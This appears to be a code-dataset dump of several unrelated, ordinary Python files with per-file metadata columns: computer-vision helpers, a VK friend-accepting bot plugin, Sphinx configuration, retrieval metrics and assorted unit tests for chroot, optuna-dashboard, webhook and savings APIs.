| 26.78481 | 122 | 0.701323 | 310 | 2,116 | 4.777419 | 0.451613 | 0.175557 | 0.072924 | 0.067522 | 0.375422 | 0.352465 | 0.352465 | 0.263336 | 0.263336 | 0.263336 | 0 | 0.13595 | 0.169187 | 2,116 | 78 | 123 | 27.128205 | 0.706485 | 0.365785 | 0 | 0.44898 | 0 | 0.020408 | 0.134512 | 0.126057 | 0 | 0 | 0.117602 | 0 | 0 | 1 | 0 | false | 0 | 0.040816 | 0 | 0.040816 | 0.020408 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c2ec73630740430e6e366707961c81fce5309c7 | 1,336 | py | Python | src/facedetectmodule.py | Pritam-N/mediapipeface | 5e14c43d74c655b99b5f74640cf5ecb941765658 | [
"MIT"
] | 1 | 2021-09-29T17:26:51.000Z | 2021-09-29T17:26:51.000Z | src/facedetectmodule.py | Pritam-N/mediapipeface | 5e14c43d74c655b99b5f74640cf5ecb941765658 | [
"MIT"
] | null | null | null | src/facedetectmodule.py | Pritam-N/mediapipeface | 5e14c43d74c655b99b5f74640cf5ecb941765658 | [
"MIT"
] | null | null | null | import cv2
import mediapipe as mp
class FaceDetector():
def __init__(self) -> None:
self.mpfacedetect = mp.solutions.face_detection
self.mpdraw = mp.solutions.drawing_utils
self.drawspec = self.mpdraw.DrawingSpec(thickness=1, circle_radius=1)
def faceDetect(self, img):
with self.mpfacedetect.FaceDetection(
min_detection_confidence=0.5) as fd:
self.imgrgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = fd.process(self.imgrgb)
if self.results.detections:
annotated_image = img.copy()
for detection in self.results.detections:
self.mpdraw.draw_detection(annotated_image, detection)
return annotated_image
return img
def main(path='PATHTOVIDEO', iswebcam=0):
if iswebcam:
cap = cv2.VideoCapture(0)
else:
cap = cv2.VideoCapture(path)
detector = FaceDetector()
while cap.isOpened():
success, img = cap.read()
if not success:
if iswebcam:
continue
break
annoted = detector.faceDetect(img)
cv2.imshow("Image", annoted)
if cv2.waitKey(5) & 0xFF == 27:
break
cap.release() | 29.043478 | 78 | 0.571856 | 139 | 1,336 | 5.395683 | 0.496403 | 0.04 | 0.056 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020455 | 0.341317 | 1,336 | 46 | 79 | 29.043478 | 0.831818 | 0 | 0 | 0.114286 | 0 | 0 | 0.012384 | 0 | 0 | 0 | 0.003096 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.057143 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c312fd3555966dcaa3bfff67b3acd068ce07388 | 911 | py | Python | plugins/friends.py | dytplay/darkvkbot | c898d1bb52c528e07bf8ad4fd4067578c7dfdbd2 | [
"MIT"
] | null | null | null | plugins/friends.py | dytplay/darkvkbot | c898d1bb52c528e07bf8ad4fd4067578c7dfdbd2 | [
"MIT"
] | null | null | null | plugins/friends.py | dytplay/darkvkbot | c898d1bb52c528e07bf8ad4fd4067578c7dfdbd2 | [
"MIT"
] | null | null | null | from plugin_system import Plugin
from settings import ACCEPT_FRIENDS, IS_GROUP
from utils import schedule_coroutine
if ACCEPT_FRIENDS:
plugin = Plugin("⛄ Автоматическое добавление друзей (каждые 10 секунд)")
@plugin.on_init()
async def get_vk(vk):
if not IS_GROUP:
schedule_coroutine(add_friends(vk))
# Функция, если её запустить(см. get_vk для примера с выполнением в фоне),
# будет выполняться каждые 10 секунд, до тех пор, пока stopper.stop == False
#
# Функция обязана принимать 1 обязательны параметр - stopper, но может
# принимать и больше
@plugin.schedule(10)
async def add_friends(stopper, vk):
result = await vk.method("friends.getRequests")
if not result or not result["count"]:
return
users = result["items"]
for user in users:
await vk.method("friends.add", {"user_id": user}) | 32.535714 | 80 | 0.672887 | 121 | 911 | 4.966942 | 0.578512 | 0.043261 | 0.046589 | 0.066556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010145 | 0.242591 | 911 | 28 | 81 | 32.535714 | 0.85942 | 0.257958 | 0 | 0 | 0 | 0 | 0.149031 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c3437b62b96e573264845ee4e16c710c7e54d96 | 2,168 | py | Python | model_processor.py | Atlas200dk/sample_bodypose | 148000d84a2c51fea9954174cb9a10b1e740ae73 | [
"Apache-2.0"
] | null | null | null | model_processor.py | Atlas200dk/sample_bodypose | 148000d84a2c51fea9954174cb9a10b1e740ae73 | [
"Apache-2.0"
] | 2 | 2020-12-16T07:08:06.000Z | 2020-12-22T07:11:34.000Z | model_processor.py | Atlas200dk/sample_bodypose | 148000d84a2c51fea9954174cb9a10b1e740ae73 | [
"Apache-2.0"
] | 1 | 2022-02-01T16:15:38.000Z | 2022-02-01T16:15:38.000Z | import os
import cv2
import numpy as np
import argparse
import sys
sys.path.append('../')
from src.pose_decode import decode_pose
from acl_model import Model
heatmap_width = 92
heatmap_height = 92
class ModelProcessor:
def __init__(self, acl_resource, params):
self._acl_resource = acl_resource
self.params = params
self._model_width = params['width']
self._model_height = params['height']
assert 'model_dir' in params and params['model_dir'] is not None, 'Review your param: model_dir'
assert os.path.exists(params['model_dir']), "Model directory doesn't exist {}".format(params['model_dir'])
# load model from path, and get model ready for inference
self.model = Model(acl_resource, params['model_dir'])
def predict(self, img_original):
#preprocess image to get 'model_input'
model_input = self.preprocess(img_original)
# execute model inference
result = self.model.execute([model_input])
# postprocessing: use the heatmaps (the second output of model) to get the joins and limbs for human body
# Note: the model has multiple outputs, here we used a simplified method, which only uses heatmap for body joints
# and the heatmap has shape of [1,14], each value correspond to the position of one of the 14 joints.
# The value is the index in the 92*92 heatmap (flatten to one dimension)
heatmaps = result[1]
# calculate the scale of original image over heatmap, Note: image_original.shape[0] is height
scale = np.array([img_original.shape[1] / heatmap_width, img_original.shape[0]/ heatmap_height])
canvas = decode_pose(heatmaps[0], scale, img_original)
return canvas
def preprocess(self,img_original):
'''
preprocessing: resize image to model required size, and normalize value between [0,1]
'''
scaled_img_data = cv2.resize(img_original, (self._model_width, self._model_height))
preprocessed_img = np.asarray(scaled_img_data, dtype=np.float32) / 255.
return preprocessed_img
| 36.133333 | 121 | 0.677122 | 295 | 2,168 | 4.813559 | 0.383051 | 0.054225 | 0.039437 | 0.028169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016403 | 0.240775 | 2,168 | 59 | 122 | 36.745763 | 0.846294 | 0.320572 | 0 | 0 | 0 | 0 | 0.082639 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.1 | false | 0 | 0.233333 | 0 | 0.433333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c3507cbd3a6c4fd3da709d6ca3898d8b90ebaea | 2,176 | py | Python | docs/conf.py | Yura52/rtdl | 5c768802e71afa622f8f2f0a6e117a75c1b2bf44 | [
"MIT"
] | 25 | 2022-03-10T21:48:50.000Z | 2022-03-30T11:47:27.000Z | docs/conf.py | Yura52/rtdl | 5c768802e71afa622f8f2f0a6e117a75c1b2bf44 | [
"MIT"
] | 1 | 2022-03-14T15:31:34.000Z | 2022-03-15T15:35:07.000Z | docs/conf.py | Yura52/rtdl | 5c768802e71afa622f8f2f0a6e117a75c1b2bf44 | [
"MIT"
] | 1 | 2022-03-21T01:39:19.000Z | 2022-03-21T01:39:19.000Z | import sys
from pathlib import Path
# Add the repository root to PYTHONPATH
rtdl_path = Path.cwd()
while not (rtdl_path.name == 'rtdl' and rtdl_path.parent.name != 'rtdl'):
rtdl_path = rtdl_path.parent
sys.path.append(str(rtdl_path))
import rtdl # noqa
# >>> Project information <<<
author = 'rtdl authors'
copyright = '2021, rtdl authors'
project = 'rtdl'
release = rtdl.__version__
version = rtdl.__version__
# >>> General options <<<
default_role = 'py:obj'
pygments_style = 'default'
repo_url = 'https://github.com/Yura52/rtdl'
templates_path = ['_templates']
# >>> Extensions options <<<
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.napoleon',
'sphinx.ext.viewcode',
# 'sphinxcontrib.spelling',
'sphinx_copybutton',
]
autoclass_content = 'both'
autodoc_member_order = 'bysource'
autodoc_inherit_docstrings = False
doctest_global_setup = '''
import numpy as np
import torch
import rtdl
import rtdl.data
from rtdl import *
from rtdl.data import *
'''
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('https://numpy.org/doc/stable', None),
'sklearn': (
'http://scikit-learn.org/stable',
(None, './_intersphinx/sklearn-objects.inv'),
),
'torch': ('https://pytorch.org/docs/stable', None),
}
napoleon_numpy_docstring = False
napoleon_use_admonition_for_examples = False
# spelling_show_suggestions = True
# >>> HTML and theme options <<<
import sphinx_material # noqa
html_static_path = ['_static']
html_theme = 'sphinx_material'
html_css_files = ['custom.css']
html_theme_options = {
'base_url': 'https://Yura52.github.io/rtdl',
'color_primary': 'red',
'globaltoc_collapse': False,
'globaltoc_depth': 2,
'logo_icon': '🏠',
'nav_links': [],
'nav_title': project + ' ' + version,
'repo_name': project,
'repo_url': repo_url,
'repo_type': 'github',
'master_doc': False,
'version_dropdown': True,
'version_json': '_static/versions.json',
}
html_sidebars = {
'**': ['logo-text.html', 'globaltoc.html', 'searchbox.html'],
}
| 24.727273 | 73 | 0.67693 | 262 | 2,176 | 5.381679 | 0.477099 | 0.034043 | 0.019858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008786 | 0.163143 | 2,176 | 87 | 74 | 25.011494 | 0.765513 | 0.099265 | 0 | 0.028986 | 0 | 0 | 0.414359 | 0.050769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.144928 | 0 | 0.144928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c391dfbceb5fa6546693e7bc39cfefbf348bba2 | 1,965 | py | Python | misc/util.py | tomfalainen/word_spotting | df1ed0ccf5e2749a4cb67ecd8484674ea9137309 | [
"MIT"
] | 6 | 2016-11-21T20:46:08.000Z | 2020-07-19T05:22:16.000Z | misc/util.py | tomfalainen/word_spotting | df1ed0ccf5e2749a4cb67ecd8484674ea9137309 | [
"MIT"
] | null | null | null | misc/util.py | tomfalainen/word_spotting | df1ed0ccf5e2749a4cb67ecd8484674ea9137309 | [
"MIT"
] | 1 | 2020-04-25T12:13:34.000Z | 2020-04-25T12:13:34.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 11:35:01 2016
@author: tomas
"""
import numpy as np
from scipy.spatial import distance as di
def average_precision(ils, t):
'''
Computes the average precision
Thanks for a fast mAP implementation!
https://github.com/ssudholt/phocnet/blob/master/src/phocnet/evaluation/retrieval.py
'''
ret_vec_relevance = ils == t
ret_vec_cumsum = np.cumsum(ret_vec_relevance, dtype=float)
ret_vec_range = np.arange(1, ret_vec_relevance.size + 1)
ret_vec_precision = ret_vec_cumsum / ret_vec_range
n_relevance = ret_vec_relevance.sum()
if n_relevance > 0:
ret_vec_ap = (ret_vec_precision * ret_vec_relevance).sum() / n_relevance
else:
ret_vec_ap = 0.0
return ret_vec_ap
def MAP(queries, qtargets, db, itargets, metric='cosine'):
APs = []
for q, query in enumerate(queries):
t = qtargets[q] #Get the label for the query
count = np.sum(itargets == t) #Count the number of relevant retrievals in the database
if count == 1:
continue
dists = np.squeeze(di.cdist(query.reshape(1, query.shape[0]), db, metric=metric))
I = np.argsort(dists)
I = I[1:] #Don't count the query, distance is always zero to query
ils = itargets[I] #Sort results after distance to query image
ap = average_precision(ils, t)
APs.append(ap)
return np.mean(APs)
def MAP_qbs(queries, qtargets, db, itargets, metric='cosine'):
APs = []
for q, query in enumerate(queries):
t = qtargets[q] #Get the label for the query
dists = np.squeeze(di.cdist(query.reshape(1, query.shape[0]), db, metric=metric))
I = np.argsort(dists)
ils = itargets[I] #Sort results after distance to query image
ap = average_precision(ils, t)
APs.append(ap)
return np.mean(APs)#, qs
| 33.305085 | 105 | 0.625445 | 281 | 1,965 | 4.24911 | 0.370107 | 0.070352 | 0.062814 | 0.050251 | 0.485762 | 0.450586 | 0.450586 | 0.450586 | 0.450586 | 0.450586 | 0 | 0.016678 | 0.267684 | 1,965 | 59 | 106 | 33.305085 | 0.813065 | 0.248346 | 0 | 0.486486 | 0 | 0 | 0.00838 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0 | 0.054054 | 0 | 0.216216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c3c518268665d6d0179b19dd73105314377e71b | 3,329 | py | Python | tests/test_chroot.py | radhermit/pychroot | 8aa38729d7978bd33bca6ff0753f0fba1ce84f85 | [
"BSD-3-Clause"
] | 27 | 2015-08-17T23:33:11.000Z | 2022-02-03T23:14:21.000Z | tests/test_chroot.py | pkgcore/pychroot | 8aa38729d7978bd33bca6ff0753f0fba1ce84f85 | [
"BSD-3-Clause"
] | 35 | 2015-01-31T08:42:48.000Z | 2021-03-16T22:21:27.000Z | tests/test_chroot.py | radhermit/pychroot | 8aa38729d7978bd33bca6ff0753f0fba1ce84f85 | [
"BSD-3-Clause"
] | 8 | 2015-01-31T08:39:40.000Z | 2021-03-17T12:25:40.000Z | import socket
from itertools import chain, cycle
from unittest import mock
from pytest import raises
from pychroot.base import Chroot
from pychroot.exceptions import ChrootError, ChrootMountError
class TestChroot:
def test_mount(self):
# testing Chroot.mount()
with mock.patch('pychroot.base.bind') as bind, \
mock.patch('os.path.exists') as exists, \
mock.patch('pychroot.base.dictbool') as dictbool, \
mock.patch('pychroot.base.simple_unshare'):
chroot = Chroot('/')
bind.side_effect = None
exists.return_value = False
dictbool.return_value = True
chroot._mount()
assert not bind.called
def test_chroot(self):
with mock.patch('os.fork') as fork, \
mock.patch('os.chroot'), \
mock.patch('os.chdir') as chdir, \
mock.patch('os.remove') as remove, \
mock.patch('os._exit'), \
mock.patch('os.path.exists') as exists, \
mock.patch('os.waitpid', return_value=(0, 0)), \
mock.patch('pychroot.utils.mount'), \
mock.patch('pychroot.base.simple_unshare'):
# bad path
exists.return_value = False
with raises(ChrootError):
Chroot('/nonexistent/path')
exists.return_value = True
# $FAKEVAR not defined in environment
with raises(ChrootMountError):
Chroot('/', mountpoints={'$FAKEVAR': {}})
# no mountpoints
chroot = Chroot('/', mountpoints=None)
assert chroot.mountpoints == {}
assert list(chroot.mounts) == []
# optional, undefined variable mounts get dropped
chroot = Chroot('/', mountpoints={
'$FAKEVAR': {'optional': True},
'/home/user': {}})
assert '$FAKEVAR' not in chroot.mounts
assert len(list(chroot.mounts)) - len(chroot.default_mounts) == 1
with mock.patch('os.getenv', return_value='/fake/src/path'):
chroot = Chroot('/', mountpoints={'$FAKEVAR': {}})
assert '/fake/src/path' in chroot.mountpoints
exists.side_effect = chain([True], cycle([False]))
with mock.patch('os.getenv', return_value='/fake/src/path'):
chroot = Chroot('/', mountpoints={'$FAKEVAR:/fake/dest/path': {}})
assert chroot.mountpoints['/fake/src/path'].get('create', False)
exists.side_effect = None
exists.return_value = True
# test parent process
fork.return_value = 10
# test UTS namespace
chroot = Chroot('/', hostname='hostname-test')
with chroot:
assert socket.gethostname() == 'hostname-test'
# test child process
fork.return_value = 0
chroot = Chroot('/')
with chroot:
pass
# make sure the default mount points aren't altered
# when passing custom mount points
default_mounts = dict(Chroot.default_mounts)
chroot = Chroot('/', mountpoints={'tmpfs:/tmp': {}})
assert default_mounts == chroot.default_mounts
| 36.582418 | 82 | 0.549414 | 337 | 3,329 | 5.356083 | 0.287834 | 0.074792 | 0.060942 | 0.046537 | 0.195014 | 0.195014 | 0.122992 | 0.122992 | 0.122992 | 0.080886 | 0 | 0.002687 | 0.329228 | 3,329 | 90 | 83 | 36.988889 | 0.805643 | 0.081406 | 0 | 0.225806 | 0 | 0 | 0.134887 | 0.033476 | 0 | 0 | 0 | 0 | 0.145161 | 1 | 0.032258 | false | 0.016129 | 0.096774 | 0 | 0.145161 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c3cd8c91477e459a2880803218179c3e591a13e | 4,017 | py | Python | tests/test_api.py | SCUTJcfeng/optuna-dashboard | cc74928ba121dc8829d43d83b3c7265388e140c5 | [
"MIT"
] | 1 | 2021-06-07T14:42:29.000Z | 2021-06-07T14:42:29.000Z | tests/test_api.py | SCUTJcfeng/optuna-dashboard | cc74928ba121dc8829d43d83b3c7265388e140c5 | [
"MIT"
] | null | null | null | tests/test_api.py | SCUTJcfeng/optuna-dashboard | cc74928ba121dc8829d43d83b3c7265388e140c5 | [
"MIT"
] | null | null | null | import json
from unittest import TestCase
import optuna
from optuna_dashboard.app import create_app
from .wsgi_client import send_request
class APITestCase(TestCase):
def test_get_study_summaries(self) -> None:
storage = optuna.storages.InMemoryStorage()
storage.create_new_study("foo1")
storage.create_new_study("foo2")
app = create_app(storage)
status, _, body = send_request(
app,
"/api/studies/",
"GET",
content_type="application/json",
)
self.assertEqual(status, 200)
study_summaries = json.loads(body)["study_summaries"]
self.assertEqual(len(study_summaries), 2)
def test_create_study(self) -> None:
for name, directions, expected_status in [
("single-objective success", ["minimize"], 201),
("multi-objective success", ["minimize", "maximize"], 201),
("invalid direction name", ["invalid-direction", "maximize"], 400),
]:
with self.subTest(name):
storage = optuna.storages.InMemoryStorage()
self.assertEqual(len(storage.get_all_study_summaries()), 0)
app = create_app(storage)
request_body = {
"study_name": "foo",
"directions": directions,
}
status, _, _ = send_request(
app,
"/api/studies",
"POST",
content_type="application/json",
body=json.dumps(request_body),
)
self.assertEqual(status, expected_status)
if expected_status == 201:
self.assertEqual(len(storage.get_all_study_summaries()), 1)
else:
self.assertEqual(len(storage.get_all_study_summaries()), 0)
def test_create_study_duplicated(self) -> None:
storage = optuna.storages.InMemoryStorage()
storage.create_new_study("foo")
self.assertEqual(len(storage.get_all_study_summaries()), 1)
app = create_app(storage)
request_body = {
"study_name": "foo",
"direction": "minimize",
}
status, _, _ = send_request(
app,
"/api/studies",
"POST",
content_type="application/json",
body=json.dumps(request_body),
)
self.assertEqual(status, 400)
self.assertEqual(len(storage.get_all_study_summaries()), 1)
def test_delete_study(self) -> None:
storage = optuna.storages.InMemoryStorage()
storage.create_new_study("foo1")
storage.create_new_study("foo2")
self.assertEqual(len(storage.get_all_study_summaries()), 2)
app = create_app(storage)
status, _, _ = send_request(
app,
"/api/studies/1",
"DELETE",
content_type="application/json",
)
self.assertEqual(status, 204)
self.assertEqual(len(storage.get_all_study_summaries()), 1)
def test_delete_study_not_found(self) -> None:
storage = optuna.storages.InMemoryStorage()
app = create_app(storage)
status, _, _ = send_request(
app,
"/api/studies/1",
"DELETE",
content_type="application/json",
)
self.assertEqual(status, 404)
class BottleRequestHookTestCase(TestCase):
def test_ignore_trailing_slashes(self) -> None:
storage = optuna.storages.InMemoryStorage()
app = create_app(storage)
endpoints = ["/api/studies", "/api/studies/"]
for endpoint in endpoints:
with self.subTest(msg=endpoint):
status, _, body = send_request(
app,
endpoint,
"GET",
content_type="application/json",
)
self.assertEqual(status, 200)
| 33.475 | 79 | 0.557132 | 382 | 4,017 | 5.617801 | 0.204188 | 0.097856 | 0.067102 | 0.081547 | 0.652377 | 0.616496 | 0.616496 | 0.616496 | 0.595527 | 0.421249 | 0 | 0.015327 | 0.33408 | 4,017 | 119 | 80 | 33.756303 | 0.786916 | 0 | 0 | 0.568627 | 0 | 0 | 0.103809 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 1 | 0.058824 | false | 0 | 0.04902 | 0 | 0.127451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c418db05d3fef8d75e9330b1cdb9a852f1d3089 | 389 | py | Python | bench/include/python/compile.py | turururu/Programming-Language-Benchmarks | de58f0ec355cad32fc64c1df5c7125fc584bf3c4 | [
"MIT"
] | null | null | null | bench/include/python/compile.py | turururu/Programming-Language-Benchmarks | de58f0ec355cad32fc64c1df5c7125fc584bf3c4 | [
"MIT"
] | null | null | null | bench/include/python/compile.py | turururu/Programming-Language-Benchmarks | de58f0ec355cad32fc64c1df5c7125fc584bf3c4 | [
"MIT"
] | null | null | null | from py_compile import compile
import os.path
def main():
for root, dirs, files in os.walk("out"):
for name in files:
if name[-3:] == '.py':
full_path = os.path.join(root, name)
compile(full_path)
compile(os.path.join('out', 'app.py'),
cfile=os.path.join('out', 'app.pyc'))
if __name__ == '__main__':
main()
| 21.611111 | 52 | 0.539846 | 54 | 389 | 3.685185 | 0.425926 | 0.120603 | 0.150754 | 0.130653 | 0.160804 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003676 | 0.300771 | 389 | 17 | 53 | 22.882353 | 0.727941 | 0 | 0 | 0 | 0 | 0 | 0.084833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c44709b91dce797ff6ef41c356fc2433f6f64a5 | 2,188 | py | Python | tests/conftest.py | modoupi/git-webhook | 4c57f1bfdb4b87183ef4adea30e90dce86fde2fa | [
"MIT"
] | 1,617 | 2016-10-24T03:24:59.000Z | 2022-03-30T08:41:55.000Z | tests/conftest.py | modoupi/git-webhook | 4c57f1bfdb4b87183ef4adea30e90dce86fde2fa | [
"MIT"
] | 54 | 2016-10-26T04:11:02.000Z | 2021-06-16T08:47:41.000Z | tests/conftest.py | modoupi/git-webhook | 4c57f1bfdb4b87183ef4adea30e90dce86fde2fa | [
"MIT"
] | 466 | 2016-10-21T08:36:28.000Z | 2022-03-16T08:02:46.000Z | # -*- coding: utf-8 -*-
import mock
import pytest
from app import app as _app, SQLAlchemyDB
from app.database import model
from app.utils import RequestUtil
import app.utils.SshUtil as ssh
from .import success, load_data
# =====================================
# base fixtures
# =====================================
@pytest.fixture
def app():
SQLAlchemyDB.create_all()
yield _app
SQLAlchemyDB.session.close()
SQLAlchemyDB.drop_all()
@pytest.fixture
def client(app):
with app.test_client() as c:
yield c
@pytest.fixture
def sql(app):
return SQLAlchemyDB.session
@pytest.fixture
def tester(app, sql):
"""模拟已登录用户"""
with app.test_client() as c:
user = create_user(sql)
mock_func = mock.MagicMock(return_value=user.dict())
with mock.patch.object(RequestUtil, 'get_login_user', new=mock_func):
yield c
def create_user(sql):
user_id = 'tester'
user = model.User(
id=user_id,
name=user_id,
location='',
avatar=''
)
sql.add(user)
sql.commit()
return user
# =====================================
# server fixtures
# =====================================
SERVER_DATA = {
'ip': '127.0.0.1',
'name': 'dev',
'port': '22',
'account': 'root',
'pkey': 'asdfghjkl',
}
def mock_do_ssh_cmd(*args, **kwargs):
return True, "OK"
@pytest.fixture
def create_server(tester):
def func(**kwargs):
data = SERVER_DATA.copy()
data.update(kwargs)
with mock.patch.object(ssh, 'do_ssh_cmd', new=mock_do_ssh_cmd):
resp = tester.post('/api/server/new', data=data)
assert success(resp)
return load_data(resp)
return func
# =====================================
# webhook fixtures
# =====================================
WEBHOOK_DATA = {
'repo': 'git-webhook',
'branch': 'master',
'shell': 'echo hello',
}
@pytest.fixture
def create_webhook(tester):
def func(**kwargs):
data = WEBHOOK_DATA.copy()
data.update(kwargs)
resp = tester.post('/api/webhook/new', data=data)
assert success(resp)
return load_data(resp)
return func
| 21.038462 | 77 | 0.556673 | 254 | 2,188 | 4.665354 | 0.334646 | 0.065823 | 0.081013 | 0.028692 | 0.207595 | 0.12827 | 0.094515 | 0.094515 | 0.094515 | 0.094515 | 0 | 0.005291 | 0.222578 | 2,188 | 103 | 78 | 21.242718 | 0.691358 | 0.139397 | 0 | 0.28169 | 0 | 0 | 0.081906 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 1 | 0.140845 | false | 0 | 0.098592 | 0.028169 | 0.338028 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c455bc2ee83ec5f1e1a08f4ecaefcb6890e8608 | 1,127 | py | Python | tests/resources/test_savings.py | andreshndz/cuenca-python | ca9f0f078584f1458e71baeb4cd15fcc55b40397 | [
"MIT"
] | 6 | 2020-11-02T21:03:11.000Z | 2022-01-13T23:12:01.000Z | tests/resources/test_savings.py | andreshndz/cuenca-python | ca9f0f078584f1458e71baeb4cd15fcc55b40397 | [
"MIT"
] | 220 | 2020-05-13T19:20:57.000Z | 2022-03-30T22:03:03.000Z | tests/resources/test_savings.py | andreshndz/cuenca-python | ca9f0f078584f1458e71baeb4cd15fcc55b40397 | [
"MIT"
] | 14 | 2020-07-15T15:32:03.000Z | 2021-09-17T19:11:14.000Z | import datetime as dt
import pytest
from cuenca_validations.types import SavingCategory
from cuenca import Saving
@pytest.mark.vcr
def test_saving_create():
saving = Saving.create(
name='my new car',
category=SavingCategory.vehicle,
goal_amount=100000,
goal_date=(dt.datetime.utcnow() + dt.timedelta(days=365)),
)
assert saving.id is not None
assert saving.is_active
assert saving.balance == 0
@pytest.mark.vcr
def test_saving_retrieve():
saving_id = 'lAob5rOC0jSj6UC5RAbwnSnA'
saving = Saving.retrieve(saving_id)
assert saving.id == saving_id
@pytest.mark.vcr
def test_saving_update():
saving_id = 'lAob5rOC0jSj6UC5RAbwnSnA'
changes = dict(
name='my new home',
goal_amount=200000,
category=SavingCategory.home,
)
saving = Saving.update(saving_id, **changes)
assert all(item in saving.to_dict().items() for item in changes.items())
@pytest.mark.vcr
def test_saving_deactivate():
saving_id = 'lAob5rOC0jSj6UC5RAbwnSnA'
saving = Saving.deactivate(saving_id)
assert saving.deactivated_at is not None
| 24.5 | 76 | 0.7063 | 142 | 1,127 | 5.450704 | 0.380282 | 0.093023 | 0.067183 | 0.082687 | 0.248062 | 0.134367 | 0 | 0 | 0 | 0 | 0 | 0.031008 | 0.198758 | 1,127 | 45 | 77 | 25.044444 | 0.826135 | 0 | 0 | 0.2 | 0 | 0 | 0.08252 | 0.063886 | 0 | 0 | 0 | 0 | 0.171429 | 1 | 0.114286 | false | 0 | 0.114286 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c46a38e5c1a4da3e3a918d1e5777fe1cefc53f9 | 1,085 | py | Python | upload/models.py | MTES-MCT/appel | 3b840ccea600ef31cfea57721fe5e6edbdbc2c79 | [
"MIT"
] | null | null | null | upload/models.py | MTES-MCT/appel | 3b840ccea600ef31cfea57721fe5e6edbdbc2c79 | [
"MIT"
] | 2 | 2021-12-15T05:10:43.000Z | 2021-12-15T05:11:00.000Z | upload/models.py | MTES-MCT/appel | 3b840ccea600ef31cfea57721fe5e6edbdbc2c79 | [
"MIT"
] | 1 | 2021-12-28T13:06:06.000Z | 2021-12-28T13:06:06.000Z | import uuid
